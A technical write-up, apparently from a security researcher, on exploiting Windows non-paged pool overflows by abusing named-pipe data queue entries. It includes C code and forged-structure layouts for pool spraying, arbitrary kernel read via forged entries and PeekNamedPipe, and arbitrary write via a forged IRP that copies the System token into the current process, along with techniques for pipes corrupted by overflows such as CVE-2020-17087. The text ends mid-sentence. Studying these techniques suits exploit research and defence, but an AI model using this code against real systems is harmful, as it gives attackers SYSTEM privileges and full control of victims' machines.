Techniques based on named pipes for pool overflow exploitation targeting the most recent (and oldest) Windows versions

Introduction

In this document we present a series of techniques that can be used to exploit overflows in the non-paged pool on Windows. The techniques (ab)use functionality provided by the named pipe file system (npfs) to turn the overflow into an arbitrary read/write and escalate privileges.

The following table shows the exploitability coverage provided by this document over different overflow categories, based on the level of control over:

  1. Overflow data. In other words, is the overflow composed of user data or "random" data? e.g. memcpy(vulnerable_chunk, user_controlled_data, overflow_size) vs memset(vulnerable_chunk, 0, overflow_size)
  2. Overflow size. memcpy(vulnerable_chunk, input_buffer, user_controlled_size) vs memcpy(vulnerable_chunk, input_buffer, random_size)

                            Overflow Size Control     No Overflow Size Control
 Overflow Data Control      (category 1)              (category 2)
 No Overflow Data Control   (category 3)              (category 4)

Previously documented techniques on the topic fell primarily under the category "Overflow Data Control && Overflow Size Control" and the goal of this research was to expand that coverage. For further discussion of the table above, see the "Approaching Different Pool Overflow Categories" chapter.

We will now go over the named-pipe concepts that allow us to build the exploitation primitives.

Named-Pipes Introduction

Named pipes are an inter-process communication mechanism that allows two processes, potentially on different computers, to share data. Briefly (for more information see [1]): a named pipe connection has a server end, which creates the pipe, and a client end, which connects to that pipe. When a named-pipe connection is established, the underlying driver creates two queues, one for each end, within the Context Control Block (CCB). The CCB, in the context of npfs, is an undocumented structure used to hold information about a particular server/client connection. The queues found within the CCB store entries that are primarily related to data written by "the other" end or to pending read operations by the current end. The structure used for the queue entries is the following:

struct DATA_QUEUE_ENTRY {
    LIST_ENTRY NextEntry;
    _IRP* Irp;
    _SECURITY_CLIENT_CONTEXT* SecurityContext;
    uint32_t EntryType;
    uint32_t QuotaInEntry;
    uint32_t DataSize;
    uint32_t x;
    char Data[];
};

Note: this is an undocumented structure; some of this information was obtained through ReactOS.

An overview of the fields above and some of the mechanisms implemented by npfs:

NextEntry: used to create a circular linked list of all the queued data entries. Entries are primarily related to read and write operations. One way of creating write-operation entries is through the WriteFile API call, and those entries are removed from the list when all of their data has been read by a client (e.g. using ReadFile). The list includes a sentinel node, which is stored within the CCB of the named pipe.

SecurityContext:

nt!_SECURITY_CLIENT_CONTEXT
   +0x000 SecurityQos      : _SECURITY_QUALITY_OF_SERVICE
   +0x010 ClientToken      : Ptr64 Void
   +0x018 DirectlyAccessClientToken : UChar
   +0x019 DirectAccessEffectiveOnly : UChar
   +0x01a ServerIsRemote   : UChar
   +0x01c ClientTokenControl : _TOKEN_CONTROL

This field enables the server end of a named pipe to impersonate the security context of a client. An overview of how it works:

  1. The client writes some data to the server queue.
  2. A DATA_QUEUE_ENTRY is created and its SecurityContext is populated with the current security context of the client
  3. Steps (1),(2) can be repeated, each time capturing the security context of the client
  4. After the server attempts to perform a read operation (and if there was no previous call to the FSCTL_XXX=0x110044 operation, see below), the SecurityContext of the current entry will be stored in the CCB of the named pipe connection. Interestingly, this step is also performed in the peek operation.

The server can then call ImpersonateNamedPipeClient, which will attempt to impersonate the security context stored in the CCB after step (4).
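
A minimal user-mode sketch of this flow from the server side (the pipe name and buffer sizes below are arbitrary choices for illustration; the client end is assumed to have connected and written a message):

#include <windows.h>
#include <stdio.h>

int main(void)
{
    // Server end: create the pipe and wait for a client to connect.
    HANDLE srv = CreateNamedPipeA("\\\\.\\pipe\\demo", PIPE_ACCESS_DUPLEX,
                                  PIPE_TYPE_MESSAGE | PIPE_READMODE_MESSAGE | PIPE_WAIT,
                                  1, 0x1000, 0x1000, 0, NULL);
    if (srv == INVALID_HANDLE_VALUE)
        return 1;
    ConnectNamedPipe(srv, NULL);

    // Steps (1)-(3): the client writes and npfs captures its security context in the
    // DATA_QUEUE_ENTRY. Step (4): our read copies that context into the CCB.
    char buf[0x100];
    DWORD got = 0;
    ReadFile(srv, buf, sizeof(buf), &got, NULL);

    // FSCTL 0x11001C under the hood: impersonate the context now stored in the CCB.
    if (ImpersonateNamedPipeClient(srv)) {
        puts("impersonating the client");
        RevertToSelf();
    }
    CloseHandle(srv);
    return 0;
}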

It is noted that npfs exposes two file system operations related to impersonation.

  1. FSCTL_XXX=0x11001C: this is the operation invoked by ImpersonateNamedPipeClient. The underlying code appears to be an inlined-optimized version of a call to NpImpersonate with specific arguments, through which it attempts to impersonate the security context stored in the Ccb.
  2. FSCTL_XXX=0x110044: calls NpImpersonate directly with specific arguments that cause the impersonation functionality to be permanently disabled for the given np connection. So step (4) above only works if there was no previous call to this operation.

EntryType: Data entries can have different types which change the way data in the structure are treated. Two important types are buffered and unbuffered entries.

Buffered Entries:

The DATA_QUEUE_ENTRY allocated is big enough to hold the actual data of the request. Buffered entries are subject to the quota management mechanism which we will see later on and can be created through the regular WriteFile API call.

Unbuffered Entries:

The DATA_QUEUE_ENTRY allocated is only big enough to hold the header, without the data. The IRP related to the request is linked to the entry and references the actual data of the request. One way to create unbuffered entries is by calling NpInternalWrite (FSCTL_XXX: 0x119FF8).

Irp: the IRP associated with the DATA_QUEUE_ENTRY. Two of the cases where this field is populated are:

a) When we have unbuffered entries

b) When a buffered entry is created with its size exceeding the available pipe quota.

QuotaInEntry: the quota consumed by the particular entry. For unbuffered entries it is 0. In buffered entries, it starts at DataSize and decreases with every read until its value drops to 0.

DataSize: This is the length of the user data associated with the current DATA_QUEUE_ENTRY

x: this field is left uninitialized at entry creation and is probably padding.

Quota management mechanism: allows the server end of the communication channel to specify the maximum amount of data the queues can hold. When that limit is exceeded:

  1. In blocking mode (PIPE_WAIT), the entry is created with QuotaInEntry set to the number of bytes still available in the current queue's quota. Then, after every read (not peek) operation on a buffered entry, the read size is added to the QuotaInEntry of the stalled write (see the sketch after this list). When QuotaInEntry becomes equal to DataSize, there is enough space in the pipe's quota to hold that entry, and its associated IRP is completed.
  2. In non-blocking mode (PIPE_NOWAIT), the operation fails (the number of written bytes will be 0).
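
The blocking-mode replenishment can be summarized with the following pseudo-code sketch; apart from the DATA_QUEUE_ENTRY field names, everything here (the model struct and complete_irp) is an illustrative stand-in rather than an actual npfs symbol:

#include <stdint.h>
#include <stddef.h>

struct dqe_model { void *Irp; uint32_t QuotaInEntry, DataSize; };

static void complete_irp(void *irp) { (void)irp; /* stand-in for completing the pended IRP */ }

// After a buffered read, the freed bytes are credited to the stalled write; once
// QuotaInEntry reaches DataSize, the write's pended IRP is completed.
static void credit_quota_after_read(struct dqe_model *stalled_write, uint32_t bytes_read)
{
    stalled_write->QuotaInEntry += bytes_read;
    if (stalled_write->QuotaInEntry >= stalled_write->DataSize && stalled_write->Irp != NULL) {
        complete_irp(stalled_write->Irp);
        stalled_write->Irp = NULL;
    }
}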

Exploitation

Spraying the non-paged pool

In the past, Alex Ionescu documented in a blog post [2] the use of buffered entries to spray the non-paged pool. Another simple way of spraying the non-paged pool is through the use of unbuffered entries. As we have seen, unbuffered entries allow memory allocations with complete control over both the size and the data (e.g. no DATA_QUEUE_ENTRY headers). Full control over the data makes unbuffered entries more suitable for some cases since:

  1. They can be used to forge data structures with complete precision (e.g. when exploiting UAF issues)
  2. The operation that involves a forged data structure might have to free the object at the end of its procedure. If our forged structure is not aligned to the beginning of a pool chunk, freeing it will cause a bug check in most allocators (probably all allocators except the LFH).

The following code can be used to create unbuffered entries:

//open the pipe/file handle with FILE_FLAG_OVERLAPPED, keeping the pipe in blocking (PIPE_WAIT) mode
NtFsControlFile(pipe_handle, 0, 0, 0, &isb, 0x119FF8, buf, sz, 0, 0);

It is noted that unbuffered entries are created mainly through the NpInternal* functions, and it's not certain whether these functionalities are meant to be exposed to userspace code. For example, NpInternalTransceive doesn't permit direct calls from userspace programs.
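
A rough spray routine could look like the following sketch. The write handles are assumed to be the ends of already-created pipes, opened with FILE_FLAG_OVERLAPPED as in the snippet above, and the NtFsControlFile prototype (not declared in every SDK header) is resolved from ntdll at run time:

#include <windows.h>
#include <winternl.h>
#include <stdlib.h>

typedef NTSTATUS (NTAPI *NtFsControlFile_t)(HANDLE, HANDLE, PVOID, PVOID,
                                            PIO_STATUS_BLOCK, ULONG, PVOID, ULONG,
                                            PVOID, ULONG);

// Queue one unbuffered entry per pipe handle: FSCTL 0x119FF8 (NpInternalWrite) pends
// the write, and the kernel allocation holding the written data carries no
// DATA_QUEUE_ENTRY header, so its size and contents are fully caller-controlled.
void spray_unbuffered(HANDLE *write_handles, size_t count, void *payload, ULONG size)
{
    NtFsControlFile_t pNtFsControlFile = (NtFsControlFile_t)
        GetProcAddress(GetModuleHandleA("ntdll"), "NtFsControlFile");
    // One status block per pended request, kept alive while the writes stay queued.
    PIO_STATUS_BLOCK isbs = (PIO_STATUS_BLOCK)calloc(count, sizeof(IO_STATUS_BLOCK));
    for (size_t i = 0; i < count; i++)
        pNtFsControlFile(write_handles[i], NULL, NULL, NULL, &isbs[i],
                         0x119FF8, payload, size, NULL, 0);
}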

Memory Disclosure/Arbitrary Read

Complete control over the overflow data

  1. Establish an arbitrary read by using the overflow to rewrite the DATA_QUEUE_ENTRY headers and forge an unbuffered entry. This technique was first documented by Corentin Bayet and Paul Fariello in [3]. It is noted that this was also the first research documenting the use of named pipes to establish a read primitive and exploit a pool overflow.

The forged entry would look like this:

DATA_QUEUE_ENTRY:
 NextEntry=whatever;
 Irp=Forged IRP Address;
 SecurityContext=ideally 0;
 EntryType=1;
 QuotaInEntry=ideally 0;
 DataSize=arbitrary read size;
 x=whatever;
 
IRP->SystemBuffer = arbitrary read address

For convenience (and in the absence of SMAP) we can place the forged Irp at a userspace address, but that's not our only option. A sketch of these forged objects follows this list.

  2. Disclose the memory adjacent to the overflown chunk by using the overflow to rewrite the DATA_QUEUE_ENTRY headers and forge a buffered entry with a DataSize bigger than the original value. This technique appears to have been first documented by @scwuaptx through a HITCON CTF challenge [4].

    This technique can be used to leak pointers/heap metadata and other interesting data that could be found/placed after our DATA_QUEUE_ENTRY.

    To make this work, the forged DATA_QUEUE_ENTRY should look like this:

    DATA_QUEUE_ENTRY:
     NextEntry=whatever;
     Irp=ideally 0;
     SecurityContext=ideally 0;
     EntryType=0;
     QuotaInEntry=ideally 0; //mostly irrelevant in case we use the peek operation
     DataSize=something bigger than the original size;
     x=whatever;
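
To make the layouts above concrete, the sketch below builds the forged objects for technique (1) in user memory (assuming the forged IRP can live at a userspace address, i.e. no SMAP). The DATA_QUEUE_ENTRY layout mirrors the structure from the introduction; the IRP offset used (AssociatedIrp.SystemBuffer at +0x18 on x64) is an assumption that should be verified against the target build. The forged entry for technique (2) differs only in using EntryType=0, Irp=0 and an inflated DataSize.

#include <stdint.h>
#include <string.h>

#pragma pack(push, 1)
typedef struct {                 // mirrors DATA_QUEUE_ENTRY from the introduction (x64)
    uint64_t Flink, Blink;       // NextEntry
    uint64_t Irp;                // -> forged IRP below (technique 1) or 0 (technique 2)
    uint64_t SecurityContext;    // ideally 0
    uint32_t EntryType;          // 1 = unbuffered, 0 = buffered
    uint32_t QuotaInEntry;       // ideally 0
    uint32_t DataSize;           // bytes npfs will hand back on a read/peek
    uint32_t x;                  // padding
} FAKE_DQE;
#pragma pack(pop)

typedef struct {                 // only the field npfs dereferences is modelled
    uint8_t  pad[0x18];          // assumed offset of AssociatedIrp.SystemBuffer (x64)
    uint64_t SystemBuffer;       // source address of the arbitrary read
} FAKE_IRP;

// Technique (1): forge an unbuffered entry whose IRP points at the address to leak.
void build_arbitrary_read_entry(FAKE_DQE *dqe, FAKE_IRP *irp,
                                uint64_t read_address, uint32_t read_size)
{
    memset(irp, 0, sizeof(*irp));
    irp->SystemBuffer = read_address;

    memset(dqe, 0, sizeof(*dqe));
    dqe->Irp       = (uint64_t)(uintptr_t)irp;   // forged IRP lives in user memory
    dqe->EntryType = 1;                          // unbuffered
    dqe->DataSize  = read_size;                  // number of bytes to leak
}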
    

Limited control over the overflow data

There are some cases where we might have only a limited set of characters at our disposal to overflow the memory with (e.g. RtlZeroMemory(buffer, bufferlen+1)). In those cases, we can overflow the Flink of a DATA_QUEUE_ENTRY and make it point to a location where we have full control over the data. We can then use the techniques previously described to establish the memory reads. On most supported 64-bit architectures we have to be careful to craft canonical addresses. With this taken into consideration, and assuming a little-endian architecture, one easy way to redirect the Flink to a controlled location is to overwrite only its first couple of bytes, since that will make it point to a memory location near the current entry. Then, with proper heap grooming, we make that location contain the forged DATA_QUEUE_ENTRY for relative/arbitrary memory reads.

This technique is illustrated below:

In this diagram, we assume that we triggered the overflow and managed to redirect the Flink to the Data part of the buffered DATA_QUEUE_ENTRY (e.g. by replacing the first byte of a segment pool allocation entry with the byte sizeof(DATA_QUEUE_ENTRY)%256). We then use the memory disclosure technique described before to leak the data of "heap chunk 2".

After getting the layout above, what's left is to read DataSize+DataSize1-sizeof(DATA_QUEUE_ENTRY)+n bytes, after which we will be able to read n bytes from "chunk 2". DataSize2 should be at least DataSize1-sizeof(DATA_QUEUE_ENTRY)+n.

In practice, there is one more challenge before using this technique. After Windows 7, Microsoft hardened the LIST_ENTRY operations with safe unlinking. Because of that, after reading DataSize bytes, the overflown DATA_QUEUE_ENTRY will be removed from the queue and its Flink/Blink will be validated, which in our case will trigger a bug check (entry->Flink->Blink!=entry). Fortunately, we can work around this issue by performing a "read-only" operation on the pipe queue through PeekNamedPipe.

So a practical approach to what we discussed here is:

  1. Groom the pool memory to ensure the overwritten Flink will be redirected to a memory location containing the forged DATA_QUEUE_ENTRY. The forged data entry will facilitate a relative memory disclosure. The Flink of the forged data entry should point to a memory location which the user can modify, for example a userspace address.
  2. Overflow the Flink. (With this approach we only have to trigger this step once.)
  3. Use PeekNamedPipe with size<DataSize+DataSize2 to activate the first forged DATA_QUEUE_ENTRY and leak adjacent pool memory (see the sketch after this list). The goal here is to leak some interesting pointers and bypass ASLR; a data entry is a perfect fit for this purpose.
  4. Modify the contents of the specified userspace address to hold a forged DATA_QUEUE_ENTRY that facilitates the arbitrary read. Use PeekNamedPipe with size=DataSize+DataSize2+n to leak n bytes from the address set in the SystemBuffer of the IRP.
  5. Repeat steps (3) or (4) as deemed necessary.
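
A minimal sketch of the peek calls used in steps (3) and (4); the handle and sizes are whatever the groom produced:

#include <windows.h>

// PeekNamedPipe never dequeues an entry, so the hardened LIST_ENTRY unlink (and its
// Flink/Blink validation) is never reached while we traverse the forged chain.
BOOL leak_bytes(HANDLE pipe, void *out, DWORD bytes_to_peek, DWORD *bytes_got)
{
    // bytes_to_peek spans the original entry's data plus (part of) the forged entry's
    // DataSize; everything past the original data comes from adjacent pool memory
    // (step 3) or from the address planted in the forged IRP (step 4).
    return PeekNamedPipe(pipe, out, bytes_to_peek, bytes_got, NULL, NULL);
}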

The approach discussed here is illustrated below:

Arbitrary Write

As with the arbitrary read, establishing any sort of write primitive using named pipes became more difficult with the hardened LIST_ENTRY operations. On Windows 7, for example, it was possible to write a kernel address (the queue's sentinel node in the Ccb) to an arbitrary location. We could have done it by forging a DATA_QUEUE_ENTRY with its Flink set to the target address and then reading the whole data entry. That would cause the data entry to be unlinked from the list, which would execute dqe->Flink->Blink=dqe->Blink. As a target address we could have potentially used the size field of a suitable GDI object.

Post-Windows 7, we have to follow a different strategy. Here we assume that we have already established the relative/arbitrary read primitive suggested in the "Limited control over the overflow data" section. The plan is to abuse the quota management mechanism we discussed earlier to forge a DATA_QUEUE_ENTRY that simulates a stalled write and points to a forged IRP; completing that IRP establishes the arbitrary write.

Now the biggest challenge is forging a valid IRP that would allow us to establish the arbitrary write upon completion. Since the IRP is a complicated structure and is legitimately processed by the kernel (i.e. IofCompleteRequest), and not by npfs as was the case in the arbitrary read technique, we have to be precise. The simplest way I found to achieve that was to create a data entry that contains an IRP, use the arbitrary read to read that IRP, convert the IRP to perform the arbitrary write, and create an unbuffered entry* to hold the forged IRP. Then, with the forged IRP in place, we just make some room in the queue by reading some data, which causes the completion of our forged IRP and thus establishes the arbitrary write.

*: It's important to use an unbuffered entry to hold the forged IRP since it will most likely get deallocated by the end of the call to IofCompleteRequest.

The simulated stalled DATA_QUEUE_ENTRY and forged IRP could look like this:

DATA_QUEUE_ENTRY:
 NextEntry.Flink=accessible address;
 Irp=Forged IRP Address;
 SecurityContext=ideally 0;
 EntryType=0;
 QuotaInEntry=0;
 DataSize=arbitrary write size;
 x=whatever;
 
Forged IRP:
 Flags=Flags&~IRP_DEALLOCATE_BUFFER|IRP_BUFFERED_IO|IRP_INPUT_OPERATION;
 AssociatedIrp=Source Address;
 UserBuffer=Destination Address;
 ThreadListEntry.Flink->Blink==ThreadListEntry.Blink->Flink==&ForgedIRPAddr->ThreadListEntry;
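
The following sketch shows how the leaked IRP bytes might be patched before being planted back through an unbuffered entry. The IRP_* flag values are the standard constants from wdm.h; the field offsets are x64 assumptions that must be checked against the target build, and the self-referencing ThreadListEntry is one simple way to satisfy the condition listed above.

#include <stdint.h>

#define IRP_BUFFERED_IO        0x00000010
#define IRP_DEALLOCATE_BUFFER  0x00000020
#define IRP_INPUT_OPERATION    0x00000040

// Assumed x64 offsets within _IRP (verify for the target build):
#define OFF_FLAGS        0x10
#define OFF_ASSOC_IRP    0x18   // AssociatedIrp.SystemBuffer
#define OFF_THREADLIST   0x20   // ThreadListEntry (LIST_ENTRY)
#define OFF_USERBUFFER   0x70

// irp:        leaked IRP bytes, modified in place before re-planting
// irp_kaddr:  kernel address the forged IRP will occupy once planted
// src_kaddr:  address copied from (e.g. the System token field)
// dst_addr:   address copied to   (e.g. the current process token field)
void patch_irp_for_write(uint8_t *irp, uint64_t irp_kaddr,
                         uint64_t src_kaddr, uint64_t dst_addr)
{
    uint32_t *flags = (uint32_t *)(irp + OFF_FLAGS);
    *flags = (*flags & ~IRP_DEALLOCATE_BUFFER) | IRP_BUFFERED_IO | IRP_INPUT_OPERATION;

    *(uint64_t *)(irp + OFF_ASSOC_IRP)  = src_kaddr;
    *(uint64_t *)(irp + OFF_USERBUFFER) = dst_addr;

    // Self-referencing list entry: Flink == Blink == &ForgedIRP->ThreadListEntry,
    // which satisfies the safe-unlink checks performed during IRP completion.
    uint64_t self = irp_kaddr + OFF_THREADLIST;
    *(uint64_t *)(irp + OFF_THREADLIST)     = self;
    *(uint64_t *)(irp + OFF_THREADLIST + 8) = self;
}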

To summarize:

  1. Spray the memory with data queue entries
  2. Use the steps laid out in the "Limited control over the overflow data" section to establish the relative/arbitrary read
  3. After step (1), it's likely that an adjacent chunk reachable through our relative read will hold a data entry. Identify that chunk and its handle (e.g. via a unique identifier in the Userdata, or by brute force), and find its address (dqe->Flink->Blink).
  4. Create a data entry on the identified handle that will have an IRP. I have tested this with a buffered entry while the pipe quota was exceeded, but it should also work with unbuffered entries.
  5. The new entry should be added to the data queue next to the leaked entry. Use the arbitrary read to find the address of the newly created entry (leaked_entry->Flink), its IRP address and finally the IRP data.
  6. With access to the IRP, we identify the associated ETHREAD/EPROCESS and the system process by following the ActiveProcessLinks (see the sketch after this list). We then note down the token addresses of the current process and the system process.
  7. Modify the IRP to enable the arbitrary write as shown above from the system token address to the current process token address with length=8.
  8. Read DataSize bytes (8 in this case) to trigger the arbitrary write.
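
A sketch of the EPROCESS walk from step (6), built on top of whatever read primitive was established earlier. kread64 is a hypothetical wrapper around that primitive, and the EPROCESS offsets are build-dependent placeholders that must be resolved for the target kernel:

#include <stdint.h>

// Hypothetical wrapper around the arbitrary read primitive: returns 8 bytes at kaddr.
extern uint64_t kread64(uint64_t kaddr);

// Placeholder EPROCESS offsets; these vary between Windows builds.
#define OFF_UNIQUE_PID    0x440   // EPROCESS.UniqueProcessId
#define OFF_ACTIVE_LINKS  0x448   // EPROCESS.ActiveProcessLinks
#define OFF_TOKEN         0x4b8   // EPROCESS.Token (_EX_FAST_REF)

// Walk ActiveProcessLinks from any known EPROCESS until the target PID is found,
// then return the address of its Token field (the source/destination of step 7).
uint64_t find_token_field(uint64_t known_eprocess, uint64_t target_pid)
{
    uint64_t cur = known_eprocess;
    do {
        if (kread64(cur + OFF_UNIQUE_PID) == target_pid)
            return cur + OFF_TOKEN;
        cur = kread64(cur + OFF_ACTIVE_LINKS) - OFF_ACTIVE_LINKS;  // next EPROCESS
    } while (cur != known_eprocess);
    return 0;
}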

Arbitrary Freeing of SECURITY_CLIENT_CONTEXT Objects

This could be an alternative to the arbitrary write for escalating privileges. As we have already seen, after each read operation on a data entry there will be an attempt to determine whether the current SecurityContext should be stored in the current Ccb or not. What's interesting for our purposes is that, in case the SecurityContext field of the DATA_QUEUE_ENTRY is populated, there will be a call to NpFreeClientSecurityContext with one of the following two arguments:

  1. the SecurityContext stored in the DATA_QUEUE_ENTRY, in case client impersonation is disabled as described in the introduction.
  2. the SecurityContext stored in the Ccb, in case impersonation is enabled. Essentially, the old context is cleaned up before being replaced with the new one.

Option (1) appears to be more straightforward since it frees the security context found in the current entry instead of the previous one, but either of the two should be usable.

So, at a high level, the way this could potentially be exploited is to forge a SECURITY_CLIENT_CONTEXT structure that is impersonable by the server, holds elevated privileges, but doesn't require special permissions to impersonate (e.g. see the remarks).

Steps:

  1. The steps at the beginning should be similar to the arbitrary write process. First, we establish the relative/arbitrary read, leak IRP data, find the current thread/process and potentially other elevated tokens that would enable us to construct that special token that is impersonable without permissions.
  2. Find the pipe handle and the address of an entry that is different from the one used to establish the read/free primitive. Let's call it pipe_handle_client/pipe_handle_server.
  3. Create n entries writing into the pipe_handle_client
  4. Start from the last entry and read its SecurityContext using the arbitrary read
  5. Trigger the arbitrary free on the address acquired in step (4)
  6. Spray unbuffered entries with the forged SECURITY_CLIENT_CONTEXT created in (1)
  7. Use the arbitrary read to verify whether we managed to replace the memory pointed to by the SecurityContext stored in (4) with the forged SECURITY_CLIENT_CONTEXT
  8. If that fails, go to the previous data entry (Blink) and repeat step (4). Entries for which we were unable to allocate our forged SCC should be considered corrupted, and an attempt to read from them will most likely trigger a BSOD. That's why we start from the end of the list and move backward: it gives us n tries to allocate the forged structure.
  9. Read all the entries in pipe_handle_server until at least one byte is read from the entry whose SecurityContext we overwrote (no more than its DataSize). At that point, the ClientContext with the forged data should already be copied to the Ccb of the pipe.
  10. Call ImpersonateNamedPipeClient on the pipe_handle_server

In the limited time spent testing this, I was able to attach a forged token to a thread, but the forged _TOKEN structure had some inconsistencies that needed fixing (e.g. integrity checks and fields pointing at absolute addresses within the token itself). Nevertheless, with some effort it should be possible to escalate privileges using this technique.

Approaching Different Pool Overflow Categories

Now we will give an overview of how the discussed techniques could be used in different overflow scenarios. Let's revisit the table we saw in the introduction:

                            Overflow Size Control     No Overflow Size Control
 Overflow Data Control      (category 1)              (category 2)
 No Overflow Data Control   (category 3)              (category 4)

  1. Data Control && Size Control

    All of the techniques discussed here should be applicable.

  2. Data Control && No Size Control

    The exploitation of overflows in this category should be similar to that of overflows in "No Data Control && No Size Control", described below. The only difference is that we have control over the overflow data, so we can avoid the problem of corrupted pipes. For example, as overflow data we can repeatedly use an address under our control (e.g. a userspace virtual address) that holds a forged data entry (e.g. overflow_data=struct.pack("<Q", userspace_address)*(overflow_size//8)+victim_entry_flink_bytes). The goal is to make the "padding memory" data entries look like this:

    DATA_QUEUE_ENTRY:
     NextEntry=userspace_address;
     Irp=userspace_address;
     SecurityContext=userspace_address;
     EntryType=userspace_address;
     QuotaInEntry=userspace_address;
     DataSize=userspace_address;
     x=userspace_address;
    

    Based on the implementation of NpReadDataQueueEntry, which is used for the read operations, data entries with EntryType values bigger than one are safely skipped (i.e. only their NextEntry is used) when a peek operation is performed. So we can use the peek operation to identify the victim_entry, since the "padding memory" entries will use the forged data entry at userspace_address, in contrast to the victim entry, which will use the forged entry specified in the redirected Flink.

  3. No Data Control && Size Control

    Here we should be able to use the techniques related to the Flink overflow described in the "Limited control over the overflow data" section.

  4. No Data Control && No Size Control

    This should be the most challenging overflow category to exploit. Its exploitability will be heavily dependent on the specifics of the underlying case. Let's say we have an overflow caused by something like this: memset(vulnerable_chunk, 0, overflow_size)

    The diagram below illustrates our initial state:

Since we have no control over the overflow data, we can try to plug in the technique described in "Limited control over the overflow data". The goal now is to place a DATA_QUEUE_ENTRY near the end of the overflown area and attempt to have its Flink partially overwritten (ideally by 1-2 bytes).

This approach is illustrated below:

As we can see in the diagram, it might be necessary to have padding memory between the vulnerable chunk and the victim entry in order to have the victim entry properly aligned for the overflow.

The size of padding memory required really depends on the vulnerable_chunk size and the overflow_size. Based on these, we have two possibilities:

i. No padding memory is required. In this case we can proceed normally with the rest of the steps to establish the read/write primitives. An example of this case is provided in the vulnerable_driver, where we essentially deal with an off-by-one overflow.

ii. Padding memory is needed. This is normally the case when overflow_size-vulnerable_chunk_size>usable_overflow_size+underlying_pool_header_size

To better understand when this situation might come up, let's briefly go through CVE-2020-17087, since it's one case where padding memory should be required.

The parameters of the overflow are the following:

vulnerable_chunk_size = (user_controlled_size*6)%65536;
vulnerable_chunk = AllocateMemory(vulnerable_chunk_size);
memset(vulnerable_chunk, 0x30, user_controlled_size*6); //not the same, but mostly equivalent

In this case we can have the following overflow parameters:

user_controlled_size = 0x2ae3; //in practice, for this instance this appears to be the only usable size (for this technique)
vulnerable_chunk_size = (0x2ae3*6)%65536 = 0x152;
vulnerable_chunk = AllocateMemory(0x152); //it falls into the 0x170 LFH bucket
memset(vulnerable_chunk, 0x30, 0x10152);

To exploit this issue with the Flink overflow technique, the following memory layout is required:

So, we have a usable_overflow_size=1-4, which is the number of bytes needed to use our technique and overflow the Flink, but the overflow is way beyond that: 0x10152-0x170 bytes. The bytes beyond those used for the Flink overflow represent the padding memory.

Now, to make things work, we have to control the allocations in the padding memory before the overflow. That's because we don't want any operations performed within that memory after the overflow, since everything there is going to be overwritten (e.g. corrupted pool allocator metadata, data structures, etc.). Some options for dealing with the padding memory:

a. If we are running at medium integrity, spray the memory with objects whose addresses we can leak (e.g. via NtQuerySystemInformation) and make sure we have the appropriate pool layout before triggering the overflow.

b. At low integrity, we use data entries to fill that memory. The biggest challenge here is identifying the victim entry after the overflow. After the overflow, the state we are left with is a bunch of corrupted data entries (the entries that fill the padding memory) and only one valid entry (the victim entry). In this situation, we have a problem that derives from the fact that the pool chunk allocation order does not always translate to the order in which the chunks are placed in memory (e.g. chunkB is allocated after chunkA, but it might be placed before chunkA in memory). For example, this is the expected behavior when the LFH services our pool chunk size. In addition, operations performed on the corrupted pipes will likely lead to a BSOD.

Given the above, we can't always know/calculate which handle corresponds to the victim_entry. Unfortunately, I couldn't identify a solid solution to this problem. Nevertheless, since this capability would allow us to have a universal set of techniques that would work in virtually any non-paged pool overflow situation, I have dedicated the chapter "Identifying Corrupted Pipes" to discussing the topic in more depth.

Identifying Corrupted Pipes

In some cases, it's useful to be able to identify pipes with corrupted data entries, for example when the overflow is caused by an integer overflow (e.g. something similar to CVE-2020-17087).

So we are now in the state shown in the diagram: we have the victim entry, whose headers have been rewritten to facilitate the read/write primitive, but several data entries have been corrupted in the process. The problem here is that we normally don't know which pipe handle corresponds to the valid victim entry. One way to find it is to iterate over all the pipe handles and perform an operation that would verify that we are dealing with the victim entry (e.g. a read operation that leaks the next chunk's data). In our instance, this is not a great approach as most operations on corrupted entries (e.g. read) will most likely cause a momentary change in the background image (i.e. a BSOD). So we want to skip over them.

Two approaches to achieve that could be:

  1. Extract some of the headers of the data entry itself and validate their values. In practice, using the peek operation, we can extract the DataSize field as shown below:
PeekNamedPipe(pipe_handle, buf, 0, 0, 0, &remaining);
//remaining=FirstEntry->DataSize-alreadyRead
//so if remaining looks like our overflow data (e.g. 0x41414141 for 'A's) the entry is most likely corrupted
  2. Find a functionality in npfs that can work through a corrupted data entry and whose control flow/responses depend on the DATA_QUEUE_ENTRY headers. For example, by calling the operation that corresponds to the code 0x116000 with a read length equal to 0, NpReadDataQueue will follow different code paths based on the value of the EntryType. If the EntryType is greater than 1, then isb.Status will be equal to 0, otherwise it will be 0x80000005. (Note: there is also a semi-reliable timing channel that allows us to determine which path was taken.)
NtFsControlFile(pipe_handle, 0, 0, 0, &isb, 0x116000, buf, 0, buf, 0);
//isb.Status==0?"corrupted":"good" (assuming the overflow wrote a value other than 0 or 1)
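
Approach (1) can be wrapped into a simple scan over candidate handles, for example as in the sketch below (the overflow_marker value assumes we know what the overflow data looks like, e.g. 0x41414141 for 'A's):

#include <windows.h>

// Returns nonzero when the first entry's remaining-bytes value looks like overflow
// data rather than a sane DataSize, i.e. the pipe is most likely corrupted.
int looks_corrupted(HANDLE pipe, DWORD overflow_marker)
{
    DWORD remaining = 0;
    if (!PeekNamedPipe(pipe, NULL, 0, NULL, NULL, &remaining))
        return 1;                        // failing peeks are treated as corrupted too
    return remaining == overflow_marker; // DataSize was overwritten by the overflow
}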

On the downside, there is a limitation with the examples provided above: they only work for pipes created with the PIPE_TYPE_MESSAGE flag. This is not ideal since, with such pipes, we are not able to use the peek operation to go past the first data entry and utilize the specially crafted Flink to activate our forged data entries (i.e. the approach used in "Limited control over the overflow data").

This behavior of the peek operation is a bit counter-intuitive (maybe a bug?) since the read mode of an operation is normally based on the read mode of the pipe and not its type mode. This is actually true for ReadFile (i.e. it uses the read mode) but not for the peek operation (which uses the type mode). The documentation of PeekNamedPipe attempts to explain this behavior (i.e. "The data is read in the mode specified with CreateNamedPipe. For example, create a pipe with PIPE_TYPE_MESSAGE | PIPE_READMODE_MESSAGE. If you change the mode to PIPE_READMODE_BYTE with SetNamedPipeHandleState, ReadFile will read in byte mode, but PeekNamedPipe will continue to read in message mode"). The problem is that this behavior persists even when the pipe is created with "PIPE_TYPE_MESSAGE | PIPE_READMODE_BYTE", which doesn't appear to conform to the documentation.

Leaking The Contents of the Overflown Data

Other than spraying and forging data structures, unbuffered entries can also be used to leak the overflown data. This works because their chunks in memory are composed entirely of user data, so nothing critical gets corrupted by the overflow (the pool header, if one exists, would still be corrupted). So after the overflow, the unbuffered entry will be filled with the overflow data, which we should be able to read afterwards.
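
A minimal sketch of that read-back; the handle is the end of the pipe that would normally consume the unbuffered write:

#include <windows.h>

// After the overflow has landed in the allocation backing an unbuffered entry,
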